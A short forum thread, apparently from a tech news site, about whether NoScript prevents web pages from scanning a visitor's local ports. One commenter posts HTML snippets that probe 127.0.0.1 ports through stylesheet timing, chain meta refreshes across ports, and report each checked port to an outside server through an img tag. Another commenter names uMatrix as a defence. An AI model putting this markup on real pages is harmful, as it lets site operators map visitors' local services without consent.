[cygx]

NoScript isn't sufficient to protect you from this.

Eg write a simple HTML file like

    <link rel="stylesheet" href="http://127.0.0.1:42">
    ok

If it takes different amounts of time for the page to stop loading and the text to appear depending on the port you checked, you're vulnerable to scans, even when Javascript is disabled.

[ricardobeat]

If the page does not have JS running, how would it check the time elapsed? i'm not seeing the vulnerability with noscript here.

[cygx]

Instead of merely printing 'ok', the page can request a resource from a server you control, eg via an <img> element.

You could probably even automate this via <meta http-equiv="refresh">, along the lines of (untested):

    <meta http-equiv="refresh" content="5; url=http://example.org/?query-port=43">
    <link rel="stylesheet" href="http://127.0.0.1:42">
    <img src="http://example.org/?checked-port=42">

[user234683]

uMatrix can protect against this if you block third party everything by default (which I do).